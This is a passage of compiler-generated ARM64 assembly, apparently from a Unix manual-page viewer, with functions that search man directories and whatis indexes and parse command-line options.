ldr x8, [x8, ___stdoutp@GOTPAGEOFF] ldr x0, [x8] bl _fflush b LBB5_43 LBB5_43: ldur x1, [x29, #-32] mov w0, #0 bl _execute adrp x9, _shown@GOTPAGE ldr x9, [x9, _shown@GOTPAGEOFF] mov w8, #1 str w8, [x9] stur w8, [x29, #-20] b LBB5_44 LBB5_44: ldur w0, [x29, #-20] ldp x29, x30, [sp, #256] ; 16-byte Folded Reload ldp x28, x27, [sp, #240] ; 16-byte Folded Reload add sp, sp, #272 ret .cfi_endproc ; -- End function .globl _member ; -- Begin function member .p2align 2 _member: ; @member .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-16] str x1, [sp, #24] ldur x0, [x29, #-16] bl _strlen str x0, [sp, #16] ldr x8, [sp, #24] adrp x9, _ALL@PAGE add x9, x9, _ALL@PAGEOFF subs x8, x8, x9 cset w8, ne tbnz w8, #0, LBB6_2 b LBB6_1 LBB6_1: mov w8, #1 stur w8, [x29, #-4] b LBB6_17 LBB6_2: b LBB6_3 LBB6_3: ; =>This Loop Header: Depth=1 ; Child Loop BB6_9 Depth 2 ldr x8, [sp, #24] ldrsb w8, [x8] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB6_16 b LBB6_4 LBB6_4: ; in Loop: Header=BB6_3 Depth=1 ldur x0, [x29, #-16] ldr x1, [sp, #24] ldr x2, [sp, #16] bl _strncmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB6_8 b LBB6_5 LBB6_5: ; in Loop: Header=BB6_3 Depth=1 ldr x8, [sp, #24] ldr x9, [sp, #16] ldrsb w8, [x8, x9] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB6_7 b LBB6_6 LBB6_6: ; in Loop: Header=BB6_3 Depth=1 ldr x8, [sp, #24] ldr x9, [sp, #16] ldrsb w8, [x8, x9] subs w8, w8, #44 cset w8, ne tbnz w8, #0, LBB6_8 b LBB6_7 LBB6_7: mov w8, #1 stur w8, [x29, #-4] b LBB6_17 LBB6_8: ; in Loop: Header=BB6_3 Depth=1 b LBB6_9 LBB6_9: ; Parent Loop BB6_3 Depth=1 ; => This Inner Loop Header: Depth=2 ldr x8, [sp, #24] ldrsb w8, [x8] subs w8, w8, #0 cset w8, eq mov w9, #0 str w9, [sp, #12] ; 4-byte Folded Spill tbnz w8, #0, LBB6_11 b LBB6_10 LBB6_10: ; in Loop: Header=BB6_9 Depth=2 ldr x8, [sp, #24] ldrsb w8, [x8] subs w8, w8, #44 cset w8, ne str w8, [sp, #12] ; 4-byte Folded Spill b LBB6_11 LBB6_11: ; in Loop: Header=BB6_9 Depth=2 ldr w8, [sp, #12] ; 4-byte Folded Reload tbz w8, #0, LBB6_13 b LBB6_12 LBB6_12: ; in Loop: Header=BB6_9 Depth=2 ldr x8, [sp, #24] add x8, x8, #1 str x8, [sp, #24] b LBB6_9 LBB6_13: ; in Loop: Header=BB6_3 Depth=1 ldr x8, [sp, #24] ldrsb w8, [x8] subs w8, w8, #44 cset w8, ne tbnz w8, #0, LBB6_15 b LBB6_14 LBB6_14: ; in Loop: Header=BB6_3 Depth=1 ldr x8, [sp, #24] add x8, x8, #1 str x8, [sp, #24] b LBB6_15 LBB6_15: ; in Loop: Header=BB6_3 Depth=1 b LBB6_3 LBB6_16: stur wzr, [x29, #-4] b LBB6_17 LBB6_17: ldur w0, [x29, #-4] ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _trymandir ; -- Begin function trymandir .p2align 2 _trymandir: ; @trymandir .cfi_startproc ; %bb.0: stp x28, x27, [sp, #-32]! ; 16-byte Folded Spill .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 .cfi_offset w27, -24 .cfi_offset w28, -32 sub sp, sp, #2256 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-24] str x0, [sp, #184] str x1, [sp, #176] str x2, [sp, #168] ldr x0, [sp, #184] bl _strlen add x8, x0, #1 add x8, x8, #6 add x8, x8, #1 subs x8, x8, #1024 cset w8, ls tbnz w8, #0, LBB7_2 b LBB7_1 LBB7_1: str wzr, [sp, #196] b LBB7_30 LBB7_2: ldr x8, [sp, #184] mov x9, sp str x8, [x9] add x0, sp, #1224 str x0, [sp, #104] ; 8-byte Folded Spill mov w1, #0 mov x2, #1024 adrp x3, l_.str.30@PAGE add x3, x3, l_.str.30@PAGEOFF bl ___sprintf_chk ldr x0, [sp, #104] ; 8-byte Folded Reload adrp x1, l_.str.16@PAGE add x1, x1, l_.str.16@PAGEOFF bl _fopen mov x8, x0 str x8, [sp, #160] subs x8, x0, #0 cset w8, eq tbnz w8, #0, LBB7_4 b LBB7_3 LBB7_3: adrp x8, _searchwindex@PAGE add x8, x8, _searchwindex@PAGEOFF str x8, [sp, #120] b LBB7_7 LBB7_4: ldr x8, [sp, #184] mov x9, sp str x8, [x9] add x0, sp, #1224 str x0, [sp, #96] ; 8-byte Folded Spill mov w1, #0 mov x2, #1024 adrp x3, l_.str.31@PAGE add x3, x3, l_.str.31@PAGEOFF bl ___sprintf_chk ldr x0, [sp, #96] ; 8-byte Folded Reload adrp x1, l_.str.16@PAGE add x1, x1, l_.str.16@PAGEOFF bl _fopen mov x8, x0 str x8, [sp, #160] subs x8, x0, #0 cset w8, ne tbnz w8, #0, LBB7_6 b LBB7_5 LBB7_5: str wzr, [sp, #196] b LBB7_30 LBB7_6: adrp x8, _searchwhatis@PAGE add x8, x8, _searchwhatis@PAGEOFF str x8, [sp, #120] b LBB7_7 LBB7_7: str wzr, [sp, #136] b LBB7_8 LBB7_8: ; =>This Loop Header: Depth=1 ; Child Loop BB7_16 Depth 2 ldr w8, [sp, #136] subs w8, w8, #0 cset w8, ne mov w9, #0 str w9, [sp, #92] ; 4-byte Folded Spill tbnz w8, #0, LBB7_10 b LBB7_9 LBB7_9: ; in Loop: Header=BB7_8 Depth=1 ldr x8, [sp, #120] ldr x0, [sp, #160] ldr x1, [sp, #176] add x2, sp, #152 add x3, sp, #144 blr x8 str w0, [sp, #140] subs w8, w0, #1 cset w8, eq str w8, [sp, #92] ; 4-byte Folded Spill b LBB7_10 LBB7_10: ; in Loop: Header=BB7_8 Depth=1 ldr w8, [sp, #92] ; 4-byte Folded Reload tbz w8, #0, LBB7_26 b LBB7_11 LBB7_11: ; in Loop: Header=BB7_8 Depth=1 ldr x0, [sp, #144] ldr x1, [sp, #168] bl _member subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB7_13 b LBB7_12 LBB7_12: ; in Loop: Header=BB7_8 Depth=1 b LBB7_8 LBB7_13: ; in Loop: Header=BB7_8 Depth=1 ldr x0, [sp, #184] bl _strlen str x0, [sp, #72] ; 8-byte Folded Spill ldr x0, [sp, #144] bl _strlen mov x9, x0 ldr x0, [sp, #72] ; 8-byte Folded Reload mov x8, #2 mul x8, x8, x9 add x8, x0, x8 str x8, [sp, #80] ; 8-byte Folded Spill ldr x0, [sp, #152] bl _strlen ldr x8, [sp, #80] ; 8-byte Folded Reload add x8, x8, x0 add x8, x8, #10 subs x8, x8, #1024 cset w8, ls tbnz w8, #0, LBB7_15 b LBB7_14 LBB7_14: ; in Loop: Header=BB7_8 Depth=1 b LBB7_8 LBB7_15: ; in Loop: Header=BB7_8 Depth=1 adrp x8, _trymandir.searchN@PAGE add x8, x8, _trymandir.searchN@PAGEOFF str x8, [sp, #112] mov w8, #10 str w8, [sp, #132] b LBB7_16 LBB7_16: ; Parent Loop BB7_8 Depth=1 ; => This Inner Loop Header: Depth=2 ldr x8, [sp, #112] ldr w8, [x8] subs w8, w8, #1 cset w8, hi tbnz w8, #0, LBB7_19 b LBB7_17 LBB7_17: ; in Loop: Header=BB7_16 Depth=2 adrp x8, _rofftype@PAGE ldr w8, [x8, _rofftype@PAGEOFF] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB7_19 b LBB7_18 LBB7_18: ; in Loop: Header=BB7_16 Depth=2 b LBB7_20 LBB7_19: ; in Loop: Header=BB7_16 Depth=2 ldr x8, [sp, #112] ldr x3, [x8, #8] ldr x12, [sp, #184] ldr x11, [sp, #144] ldr x10, [sp, #152] ldr x8, [sp, #144] mov x9, sp str x12, [x9] str x11, [x9, #8] str x10, [x9, #16] str x8, [x9, #24] add x0, sp, #200 str x0, [sp, #64] ; 8-byte Folded Spill mov w1, #0 mov x2, #1024 bl ___sprintf_chk ldr x0, [sp, #64] ; 8-byte Folded Reload ldr x8, [sp, #112] ldr w1, [x8] adrp x2, l_.str.32@PAGE add x2, x2, l_.str.32@PAGEOFF bl _showpage str w0, [sp, #136] b LBB7_20 LBB7_20: ; in Loop: Header=BB7_16 Depth=2 ldr x8, [sp, #112] add x8, x8, #16 str x8, [sp, #112] ldr w8, [sp, #136] subs w8, w8, #0 cset w8, ne mov w9, #0 str w9, [sp, #60] ; 4-byte Folded Spill tbnz w8, #0, LBB7_22 b LBB7_21 LBB7_21: ; in Loop: Header=BB7_16 Depth=2 ldr w8, [sp, #132] subs w8, w8, #1 str w8, [sp, #132] subs w8, w8, #0 cset w8, ne str w8, [sp, #60] ; 4-byte Folded Spill b LBB7_22 LBB7_22: ; in Loop: Header=BB7_16 Depth=2 ldr w8, [sp, #60] ; 4-byte Folded Reload tbnz w8, #0, LBB7_16 b LBB7_23 LBB7_23: ; in Loop: Header=BB7_8 Depth=1 adrp x8, _all@PAGE ldr w8, [x8, _all@PAGEOFF] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB7_25 b LBB7_24 LBB7_24: ; in Loop: Header=BB7_8 Depth=1 str wzr, [sp, #136] b LBB7_25 LBB7_25: ; in Loop: Header=BB7_8 Depth=1 b LBB7_8 LBB7_26: ldr w8, [sp, #140] subs w8, w8, #0 cset w8, ge tbnz w8, #0, LBB7_29 b LBB7_27 LBB7_27: ldr x0, [sp, #160] bl _ferror subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB7_29 b LBB7_28 LBB7_28: adrp x8, ___stderrp@GOTPAGE ldr x8, [x8, ___stderrp@GOTPAGEOFF] ldr x8, [x8] str x8, [sp, #48] ; 8-byte Folded Spill bl ___error ldr w0, [x0] bl _strerror mov x8, x0 ldr x0, [sp, #48] ; 8-byte Folded Reload mov x9, sp add x10, sp, #1224 str x10, [x9] str x8, [x9, #8] adrp x1, l_.str.6@PAGE add x1, x1, l_.str.6@PAGEOFF bl _fprintf mov w0, #1 bl _exit LBB7_29: ldr x0, [sp, #160] bl _fclose ldr w8, [sp, #136] str w8, [sp, #196] b LBB7_30 LBB7_30: ldr w8, [sp, #196] str w8, [sp, #44] ; 4-byte Folded Spill ldur x9, [x29, #-24] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB7_32 b LBB7_31 LBB7_31: bl ___stack_chk_fail LBB7_32: ldr w0, [sp, #44] ; 4-byte Folded Reload add sp, sp, #2256 ldp x29, x30, [sp, #16] ; 16-byte Folded Reload ldp x28, x27, [sp], #32 ; 16-byte Folded Reload ret .cfi_endproc ; -- End function .globl _trysubmandir ; -- Begin function trysubmandir .p2align 2 _trysubmandir: ; @trysubmandir .cfi_startproc ; %bb.0: stp x28, x27, [sp, #-32]! ; 16-byte Folded Spill .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 .cfi_offset w27, -24 .cfi_offset w28, -32 sub sp, sp, #1120 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-24] str x0, [sp, #72] str x1, [sp, #64] str x2, [sp, #56] ldr x0, [sp, #72] bl _opendir mov x8, x0 str x8, [sp, #48] subs x8, x0, #0 cset w8, ne tbnz w8, #0, LBB8_2 b LBB8_1 LBB8_1: str wzr, [sp, #84] b LBB8_18 LBB8_2: b LBB8_3 LBB8_3: ; =>This Inner Loop Header: Depth=1 ldr x0, [sp, #48] bl _readdir mov x8, x0 str x8, [sp, #40] subs x8, x0, #0 cset w8, eq tbnz w8, #0, LBB8_17 b LBB8_4 LBB8_4: ; in Loop: Header=BB8_3 Depth=1 ldr x8, [sp, #40] add x0, x8, #21 adrp x1, l_.str.33@PAGE add x1, x1, l_.str.33@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB8_6 b LBB8_5 LBB8_5: ; in Loop: Header=BB8_3 Depth=1 ldr x8, [sp, #40] add x0, x8, #21 adrp x1, l_.str.34@PAGE add x1, x1, l_.str.34@PAGEOFF bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB8_7 b LBB8_6 LBB8_6: ; in Loop: Header=BB8_3 Depth=1 b LBB8_3 LBB8_7: ; in Loop: Header=BB8_3 Depth=1 ldr x8, [sp, #40] add x0, x8, #21 adrp x1, l_.str.35@PAGE add x1, x1, l_.str.35@PAGEOFF mov x2, #3 bl _strncmp subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB8_9 b LBB8_8 LBB8_8: ; in Loop: Header=BB8_3 Depth=1 ldr x8, [sp, #40] add x0, x8, #21 adrp x1, l_.str.2@PAGE add x1, x1, l_.str.2@PAGEOFF mov x2, #3 bl _strncmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB8_11 b LBB8_9 LBB8_9: ; in Loop: Header=BB8_3 Depth=1 ldr x8, [sp, #40] ldrsb w8, [x8, #24] subs w8, w8, #48 subs w8, w8, #9 cset w8, hi tbnz w8, #0, LBB8_11 b LBB8_10 LBB8_10: ; in Loop: Header=BB8_3 Depth=1 b LBB8_3 LBB8_11: ; in Loop: Header=BB8_3 Depth=1 ldr x0, [sp, #72] bl _strlen add x8, x0, #1 str x8, [sp, #32] ; 8-byte Folded Spill ldr x8, [sp, #40] add x0, x8, #21 bl _strlen ldr x8, [sp, #32] ; 8-byte Folded Reload add x8, x8, x0 add x8, x8, #1 subs x8, x8, #1024 cset w8, ls tbnz w8, #0, LBB8_13 b LBB8_12 LBB8_12: ; in Loop: Header=BB8_3 Depth=1 b LBB8_3 LBB8_13: ; in Loop: Header=BB8_3 Depth=1 ldr x10, [sp, #72] ldr x8, [sp, #40] add x8, x8, #21 mov x9, sp str x10, [x9] str x8, [x9, #8] add x0, sp, #88 str x0, [sp, #24] ; 8-byte Folded Spill mov w1, #0 mov x2, #1024 adrp x3, l_.str.36@PAGE add x3, x3, l_.str.36@PAGEOFF bl ___sprintf_chk ldr x0, [sp, #24] ; 8-byte Folded Reload ldr x1, [sp, #64] ldr x2, [sp, #56] bl _trymandir subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB8_16 b LBB8_14 LBB8_14: ; in Loop: Header=BB8_3 Depth=1 adrp x8, _all@PAGE ldr w8, [x8, _all@PAGEOFF] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB8_16 b LBB8_15 LBB8_15: ldr x0, [sp, #48] bl _closedir mov w8, #1 str w8, [sp, #84] b LBB8_18 LBB8_16: ; in Loop: Header=BB8_3 Depth=1 b LBB8_3 LBB8_17: ldr x0, [sp, #48] bl _closedir str wzr, [sp, #84] b LBB8_18 LBB8_18: ldr w8, [sp, #84] str w8, [sp, #20] ; 4-byte Folded Spill ldur x9, [x29, #-24] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB8_20 b LBB8_19 LBB8_19: bl ___stack_chk_fail LBB8_20: ldr w0, [sp, #20] ; 4-byte Folded Reload add sp, sp, #1120 ldp x29, x30, [sp, #16] ; 16-byte Folded Reload ldp x28, x27, [sp], #32 ; 16-byte Folded Reload ret .cfi_endproc ; -- End function .globl _searchmanpath ; -- Begin function searchmanpath .p2align 2 _searchmanpath: ; @searchmanpath .cfi_startproc ; %bb.0: stp x28, x27, [sp, #-32]! ; 16-byte Folded Spill .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 .cfi_offset w27, -24 .cfi_offset w28, -32 sub sp, sp, #1072 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-24] str x0, [sp, #32] str x1, [sp, #24] adrp x8, _manpath@GOTPAGE ldr x8, [x8, _manpath@GOTPAGEOFF] ldr x8, [x8] str x8, [sp, #16] b LBB9_1 LBB9_1: ; =>This Loop Header: Depth=1 ; Child Loop BB9_2 Depth 2 ; Child Loop BB9_9 Depth 2 b LBB9_2 LBB9_2: ; Parent Loop BB9_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldr x8, [sp, #16] ldrsb w8, [x8] subs w8, w8, #0 cset w8, eq mov w9, #0 str w9, [sp, #4] ; 4-byte Folded Spill tbnz w8, #0, LBB9_4 b LBB9_3 LBB9_3: ; in Loop: Header=BB9_2 Depth=2 ldr x8, [sp, #16] ldrsb w8, [x8] subs w8, w8, #58 cset w8, eq str w8, [sp, #4] ; 4-byte Folded Spill b LBB9_4 LBB9_4: ; in Loop: Header=BB9_2 Depth=2 ldr w8, [sp, #4] ; 4-byte Folded Reload tbz w8, #0, LBB9_6 b LBB9_5 LBB9_5: ; in Loop: Header=BB9_2 Depth=2 ldr x8, [sp, #16] add x8, x8, #1 str x8, [sp, #16] b LBB9_2 LBB9_6: ; in Loop: Header=BB9_1 Depth=1 ldr x8, [sp, #16] ldrsb w8, [x8] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB9_8 b LBB9_7 LBB9_7: b LBB9_24 LBB9_8: ; in Loop: Header=BB9_1 Depth=1 add x8, sp, #40 str x8, [sp, #8] b LBB9_9 LBB9_9: ; Parent Loop BB9_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldr x8, [sp, #16] ldrsb w8, [x8] subs w8, w8, #0 cset w8, eq mov w9, #0 str w9, [sp] ; 4-byte Folded Spill tbnz w8, #0, LBB9_11 b LBB9_10 LBB9_10: ; in Loop: Header=BB9_9 Depth=2 ldr x8, [sp, #16] ldrsb w8, [x8] subs w8, w8, #58 cset w8, ne str w8, [sp] ; 4-byte Folded Spill b LBB9_11 LBB9_11: ; in Loop: Header=BB9_9 Depth=2 ldr w8, [sp] ; 4-byte Folded Reload tbz w8, #0, LBB9_15 b LBB9_12 LBB9_12: ; in Loop: Header=BB9_9 Depth=2 ldr x8, [sp, #8] add x9, sp, #40 add x9, x9, #1024 subs x8, x8, x9 cset w8, hs tbnz w8, #0, LBB9_14 b LBB9_13 LBB9_13: ; in Loop: Header=BB9_9 Depth=2 ldr x8, [sp, #16] ldrb w8, [x8] ldr x9, [sp, #8] add x10, x9, #1 str x10, [sp, #8] strb w8, [x9] b LBB9_14 LBB9_14: ; in Loop: Header=BB9_9 Depth=2 ldr x8, [sp, #16] add x8, x8, #1 str x8, [sp, #16] b LBB9_9 LBB9_15: ; in Loop: Header=BB9_1 Depth=1 ldr x8, [sp, #8] add x9, sp, #40 add x9, x9, #1024 subs x8, x8, x9 cset w8, ne tbnz w8, #0, LBB9_17 b LBB9_16 LBB9_16: ; in Loop: Header=BB9_1 Depth=1 b LBB9_1 LBB9_17: ; in Loop: Header=BB9_1 Depth=1 ldr x8, [sp, #8] strb wzr, [x8] ldr x1, [sp, #32] ldr x2, [sp, #24] add x0, sp, #40 bl _trysubmandir subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB9_20 b LBB9_18 LBB9_18: ; in Loop: Header=BB9_1 Depth=1 adrp x8, _all@PAGE ldr w8, [x8, _all@PAGEOFF] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB9_20 b LBB9_19 LBB9_19: b LBB9_24 LBB9_20: ; in Loop: Header=BB9_1 Depth=1 ldr x1, [sp, #32] ldr x2, [sp, #24] add x0, sp, #40 bl _trymandir subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB9_23 b LBB9_21 LBB9_21: ; in Loop: Header=BB9_1 Depth=1 adrp x8, _all@PAGE ldr w8, [x8, _all@PAGEOFF] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB9_23 b LBB9_22 LBB9_22: b LBB9_24 LBB9_23: ; in Loop: Header=BB9_1 Depth=1 b LBB9_1 LBB9_24: ldur x9, [x29, #-24] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB9_26 b LBB9_25 LBB9_25: bl ___stack_chk_fail LBB9_26: add sp, sp, #1072 ldp x29, x30, [sp, #16] ; 16-byte Folded Reload ldp x28, x27, [sp], #32 ; 16-byte Folded Reload ret .cfi_endproc ; -- End function .globl _usage ; -- Begin function usage .p2align 2 _usage: ; @usage .cfi_startproc ; %bb.0: stp x29, x30, [sp, #-16]! ; 16-byte Folded Spill .cfi_def_cfa_offset 16 mov x29, sp .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, ___stderrp@GOTPAGE ldr x8, [x8, ___stderrp@GOTPAGEOFF] ldr x0, [x8] adrp x1, l_.str.37@PAGE add x1, x1, l_.str.37@PAGEOFF bl _fprintf mov w0, #1 bl _exit .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #112 .cfi_def_cfa_offset 112 stp x29, x30, [sp, #96] ; 16-byte Folded Spill add x29, sp, #96 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _manpath@GOTPAGE ldr x8, [x8, _manpath@GOTPAGEOFF] str x8, [sp, #32] ; 8-byte Folded Spill adrp x8, _shown@GOTPAGE ldr x8, [x8, _shown@GOTPAGEOFF] str x8, [sp, #40] ; 8-byte Folded Spill stur wzr, [x29, #-4] stur w0, [x29, #-8] stur x1, [x29, #-16] adrp x8, _ALL@PAGE add x8, x8, _ALL@PAGEOFF stur x8, [x29, #-32] stur wzr, [x29, #-40] adrp x0, l_.str.38@PAGE add x0, x0, l_.str.38@PAGEOFF bl _getenv adrp x9, _pager@GOTPAGE ldr x9, [x9, _pager@GOTPAGEOFF] mov x8, x0 str x8, [x9] subs x8, x0, #0 cset w8, ne tbnz w8, #0, LBB11_2 b LBB11_1 LBB11_1: adrp x8, _PAGER@PAGE add x8, x8, _PAGER@PAGEOFF adrp x9, _pager@GOTPAGE ldr x9, [x9, _pager@GOTPAGEOFF] str x8, [x9] b LBB11_2 LBB11_2: adrp x0, l_.str.39@PAGE add x0, x0, l_.str.39@PAGEOFF bl _getenv ldr x9, [sp, #32] ; 8-byte Folded Reload mov x8, x0 str x8, [x9] subs x8, x0, #0 cset w8, ne tbnz w8, #0, LBB11_4 b LBB11_3 LBB11_3: ldr x9, [sp, #32] ; 8-byte Folded Reload adrp x8, _MANPATH@PAGE add x8, x8, _MANPATH@PAGEOFF str x8, [x9] b LBB11_4 LBB11_4: mov w0, #1 str w0, [sp, #28] ; 4-byte Folded Spill bl _isatty ldr w8, [sp, #28] ; 4-byte Folded Reload adrp x9, _tty@GOTPAGE ldr x9, [x9, _tty@GOTPAGEOFF] str w0, [x9] stur w8, [x29, #-36] b LBB11_5 LBB11_5: ; =>This Loop Header: Depth=1 ; Child Loop BB11_6 Depth 2 ; Child Loop BB11_14 Depth 3 b LBB11_6 LBB11_6: ; Parent Loop BB11_5 Depth=1 ; => This Loop Header: Depth=2 ; Child Loop BB11_14 Depth 3 ldur w8, [x29, #-36] ldur w9, [x29, #-8] subs w8, w8, w9 cset w8, ge mov w9, #0 str w9, [sp, #24] ; 4-byte Folded Spill tbnz w8, #0, LBB11_9 b LBB11_7 LBB11_7: ; in Loop: Header=BB11_6 Depth=2 ldur x8, [x29, #-16] ldursw x9, [x29, #-36] ldr x8, [x8, x9, lsl #3] ldrsb w8, [x8] subs w8, w8, #45 cset w8, ne mov w9, #0 str w9, [sp, #24] ; 4-byte Folded Spill tbnz w8, #0, LBB11_9 b LBB11_8 LBB11_8: ; in Loop: Header=BB11_6 Depth=2 ldur w8, [x29, #-40] subs w8, w8, #0 cset w8, eq str w8, [sp, #24] ; 4-byte Folded Spill b LBB11_9 LBB11_9: ; in Loop: Header=BB11_6 Depth=2 ldr w8, [sp, #24] ; 4-byte Folded Reload tbz w8, #0, LBB11_38 b LBB11_10 LBB11_10: ; in Loop: Header=BB11_6 Depth=2 ldur x8, [x29, #-16] ldursw x9, [x29, #-36] mov x10, x9 add w10, w10, #1 stur w10, [x29, #-36] ldr x8, [x8, x9, lsl #3] add x8, x8, #1 str x8, [sp, #48] ldr x8, [sp, #48] ldrsb w8, [x8] subs w8, w8, #45 cset w8, ne tbnz w8, #0, LBB11_13 b LBB11_11 LBB11_11: ; in Loop: Header=BB11_6 Depth=2 ldr x8, [sp, #48] ldrsb w8, [x8, #1] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB11_13 b LBB11_12 LBB11_12: ; in Loop: Header=BB11_5 Depth=1 mov w8, #1 stur w8, [x29, #-40] b LBB11_38 LBB11_13: ; in Loop: Header=BB11_6 Depth=2 b LBB11_14 LBB11_14: ; Parent Loop BB11_5 Depth=1 ; Parent Loop BB11_6 Depth=2 ; => This Inner Loop Header: Depth=3 ldr x8, [sp, #48] ldrsb w8, [x8] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB11_37 b LBB11_15 LBB11_15: ; in Loop: Header=BB11_14 Depth=3 ldr x8, [sp, #48] add x9, x8, #1 str x9, [sp, #48] ldrsb w8, [x8] subs w8, w8, #77 ; kill: def $x8 killed $w8 str x8, [sp, #16] ; 8-byte Folded Spill subs x8, x8, #39 cset w8, hi tbnz w8, #0, LBB11_35 ; %bb.16: ; in Loop: Header=BB11_14 Depth=3 ldr x11, [sp, #16] ; 8-byte Folded Reload adrp x10, lJTI11_0@PAGE add x10, x10, lJTI11_0@PAGEOFF Ltmp1: adr x8, Ltmp1 ldrsw x9, [x10, x11, lsl #2] add x8, x8, x9 br x8 LBB11_17: ; in Loop: Header=BB11_14 Depth=3 adrp x9, _all@PAGE mov w8, #1 str w8, [x9, _all@PAGEOFF] b LBB11_36 LBB11_18: ; in Loop: Header=BB11_14 Depth=3 adrp x9, _whatis@PAGE mov w8, #1 str w8, [x9, _whatis@PAGEOFF] b LBB11_36 LBB11_19: ; in Loop: Header=BB11_14 Depth=3 adrp x9, _apropos@PAGE mov w8, #1 str w8, [x9, _apropos@PAGEOFF] b LBB11_36 LBB11_20: ; in Loop: Header=BB11_14 Depth=3 adrp x9, _quiet@PAGE mov w8, #1 str w8, [x9, _quiet@PAGEOFF] b LBB11_36 LBB11_21: ; in Loop: Header=BB11_14 Depth=3 adrp x8, _rofftype@PAGE str wzr, [x8, _rofftype@PAGEOFF] adrp x8, _whatis@PAGE str wzr, [x8, _whatis@PAGEOFF] adrp x8, _apropos@PAGE str wzr, [x8, _apropos@PAGEOFF] b LBB11_36 LBB11_22: ; in Loop: Header=BB11_14 Depth=3 adrp x9, _rofftype@PAGE mov w8, #1 str w8, [x9, _rofftype@PAGEOFF] adrp x8, _whatis@PAGE str wzr, [x8, _whatis@PAGEOFF] adrp x8, _apropos@PAGE str wzr, [x8, _apropos@PAGEOFF] b LBB11_36 LBB11_23: ; in Loop: Header=BB11_14 Depth=3 ldr x8, [sp, #48] ldrsb w8, [x8] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB11_27 b LBB11_24 LBB11_24: ; in Loop: Header=BB11_14 Depth=3 ldur w8, [x29, #-36] ldur w9, [x29, #-8] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB11_26 b LBB11_25 LBB11_25: ; in Loop: Header=BB11_14 Depth=3 bl _usage b LBB11_26 LBB11_26: ; in Loop: Header=BB11_14 Depth=3 ldur x8, [x29, #-16] ldursw x9, [x29, #-36] mov x10, x9 add w10, w10, #1 stur w10, [x29, #-36] ldr x8, [x8, x9, lsl #3] stur x8, [x29, #-32] b LBB11_28 LBB11_27: ; in Loop: Header=BB11_14 Depth=3 ldr x8, [sp, #48] stur x8, [x29, #-32] adrp x8, l_.str.40@PAGE add x8, x8, l_.str.40@PAGEOFF str x8, [sp, #48] b LBB11_28 LBB11_28: ; in Loop: Header=BB11_14 Depth=3 b LBB11_36 LBB11_29: ; in Loop: Header=BB11_14 Depth=3 ldr x8, [sp, #48] ldrsb w8, [x8] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB11_33 b LBB11_30 LBB11_30: ; in Loop: Header=BB11_14 Depth=3 ldur w8, [x29, #-36] ldur w9, [x29, #-8] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB11_32 b LBB11_31 LBB11_31: ; in Loop: Header=BB11_14 Depth=3 bl _usage b LBB11_32 LBB11_32: ; in Loop: Header=BB11_14 Depth=3 ldr x9, [sp, #32] ; 8-byte Folded Reload ldur x8, [x29, #-16] ldursw x10, [x29, #-36] mov x11, x10 add w11, w11, #1 stur w11, [x29, #-36] ldr x8, [x8, x10, lsl #3] str x8, 